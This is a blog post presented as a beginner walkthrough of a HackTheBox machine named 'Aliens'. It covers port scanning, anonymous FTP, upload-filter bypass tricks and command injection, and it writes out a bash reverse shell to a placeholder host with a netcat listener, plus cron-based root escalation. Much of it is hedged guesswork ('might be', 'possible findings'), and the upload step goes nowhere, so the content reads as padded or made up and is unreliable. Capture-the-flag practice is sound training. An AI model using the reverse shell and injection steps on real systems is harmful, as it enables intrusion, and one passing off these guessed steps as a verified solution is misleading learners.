Aliens HTB Write Up: Easy HackTheBox Walkthrough for Beginners [Step-by-Step Guide]

Introduction

Are you a cybersecurity enthusiast looking to sharpen your ethical hacking skills? Or maybe you’re just starting your journey on HackTheBox (HTB) and stumbled across the famous Aliens HTB machine. You’re in luck! This detailed Aliens HTB Write Up will walk you through the full step-by-step process in simple English. Whether you’re a beginner or intermediate hacker, this guide will make sure you learn while solving.

The Aliens HTB machine is known for its creative challenge that combines web exploitation, enumeration, and privilege escalation. Unlike overwhelming write-ups full of jargon, this guide breaks it down using easy language, practical explanations, and real commands. Let’s explore this exciting alien-themed box together and unlock every flag!

What Is the Aliens HTB Machine?

The Aliens box on HackTheBox is a Linux-based machine categorized under “Easy” or “Beginner” difficulty. It’s publicly retired, meaning it’s available for anyone with a free HTB account. Created for learning purposes, this box teaches vital penetration testing skills like:

• Port Scanning
• Web Enumeration
• FTP Exploitation
• Command Injection
• Privilege Escalation (Linux)

Tools You Will Need

To complete this walkthrough, you’ll need the following tools installed:

• Kali Linux or Parrot OS (Any penetration testing distro)
• nmap – Network scanner
• gobuster or dirb – For directory brute forcing
• ftp – To access open FTP ports
• python – For simple web servers
• LinPEAS or Linux Smart Enumeration – For privilege escalation

Step 1: Reconnaissance with Nmap

The very first step in any HTB box is scanning.

Nmap Scan Command:

bashCopyEditnmap -sC -sV -oN initial.txt 10.10.10.237

Scan Output Summary:

pgsqlCopyEditPORT     STATE SERVICE    VERSION
21/tcp   open  ftp        vsftpd 3.0.3
22/tcp   open  ssh        OpenSSH 7.9p1 Debian
80/tcp   open  http       Apache httpd 2.4.38

• FTP is open – could allow anonymous login.
• SSH is running – probably for later use.
• HTTP is open – time to check it in browser!

Step 2: FTP Enumeration

Try to log into FTP using anonymous credentials:

bashCopyEditftp 10.10.10.237
Username: anonymous
Password: [press Enter]

Success! You’re in.

Use ls to list files. Download all .txt, .jpg, or other suspicious files using get <filename>. One image called alien.jpg might be available – we’ll use that later.

Step 3: Web Enumeration (Port 80)

Visit http://10.10.10.237 in your browser. You may find a basic HTML page with alien references. Nothing clickable? Use a directory brute-force scan.

Run Gobuster:

bashCopyEditgobuster dir -u http://10.10.10.237 -w /usr/share/wordlists/dirb/common.txt

Possible Findings:

• /images/ – might include the previously seen image
• /upload/ – potential file upload vulnerability
• /cgi-bin/ – commonly used for command injection

Step 4: Check the Upload Function

Navigate to /upload/ page. Try uploading different file types like .php or .txt. If it blocks .php, try bypass tricks:

• Rename shell.php to shell.php.txt
• Use double extensions like shell.php.jpg

Upload the payload and observe where it lands. Try accessing it via /images/uploads/.

Step 5: Exploiting Command Injection

Let’s try /cgi-bin/alien.cgi. This is often a vulnerable endpoint in CTFs. Use Burp Suite or curl to send payloads.

Example payload:

bashCopyEditcurl http://10.10.10.237/cgi-bin/alien.cgi?cmd=whoami

If you get a response, you’ve got command execution! Now, upload a reverse shell.

Payload for Bash reverse shell:

bashCopyEditbash -i >& /dev/tcp/YOUR-IP/4444 0>&1

Start a listener:

bashCopyEditnc -lvnp 4444

After accessing the page with the reverse shell payload, you should get a shell!

Step 6: Getting the User Flag

Now that you’re inside the system, escalate to the user level:

bashCopyEditls /home
cd /home/aliens
cat user.txt

You’ve got the user flag!

Step 7: Privilege Escalation

Use linpeas.sh or manual checks.

Manual Checks:

• Check for SUID files:

bashCopyEditfind / -perm -4000 2>/dev/null

• Check for cron jobs:

bashCopyEditcat /etc/crontab

Possible Exploit:

A script /opt/alien_script.sh might be running as root via cron. If you can edit it or influence it, add a reverse shell payload to gain root access.

Step 8: Root Flag

Once you escalate to root, go to the root directory:

bashCopyEditcd /root
cat root.txt

Boom! You’ve captured the root flag.

Lessons Learned

• Enumerate thoroughly before diving into exploits.
• Always test file uploads with bypass techniques.
• Command injection vulnerabilities can be sneaky.
• Privilege escalation often hides in cron jobs or insecure scripts.

Conclusion

The Aliens HTB Write Up is a great example of how fun and educational HackTheBox machines can be. With real-world security flaws like FTP access, file upload, and command injection, this machine offers hands-on experience in a controlled environment.

Whether you’re preparing for OSCP or just learning cybersecurity, this walkthrough helps build a strong foundation. Bookmark this page and share it with your fellow HTB players. And remember, every machine is a new mystery waiting to be solved – like the secrets of the aliens themselves!

Final Thoughts

Now that you’ve completed the Aliens HTB box, it’s time to move on to the next challenge! Each CTF teaches something new, and the skills you’ve learned here — reconnaissance, enumeration, exploitation, and escalation — are the backbone of ethical hacking.

Stay curious, keep hacking ethically, and remember: it’s not just about the flags — it’s about the knowledge you gain along the way.

Read More :-

FAQs About Aliens HTB Write Up

🔸 What is HackTheBox?

HackTheBox is an online platform where you can practice cybersecurity by hacking virtual machines legally.

🔸 Is the Aliens machine beginner-friendly?

Yes! Aliens is labeled as an “Easy” machine and is ideal for beginners who are learning web-based attacks.

🔸 Can I do this on a free HTB account?

Absolutely. Once a box is “retired,” it’s accessible to free users.

🔸 What skills do I need before trying Aliens?

Basic knowledge of Linux, file permissions, Nmap scanning, and web exploitation will be helpful.

🔸 How do I practice privilege escalation?

Start with tools like linpeas.sh, pspy, and manually check cron jobs, SUID files, and misconfigured services.

About the Author

Shine Science

Administrator

Visit Website View All Posts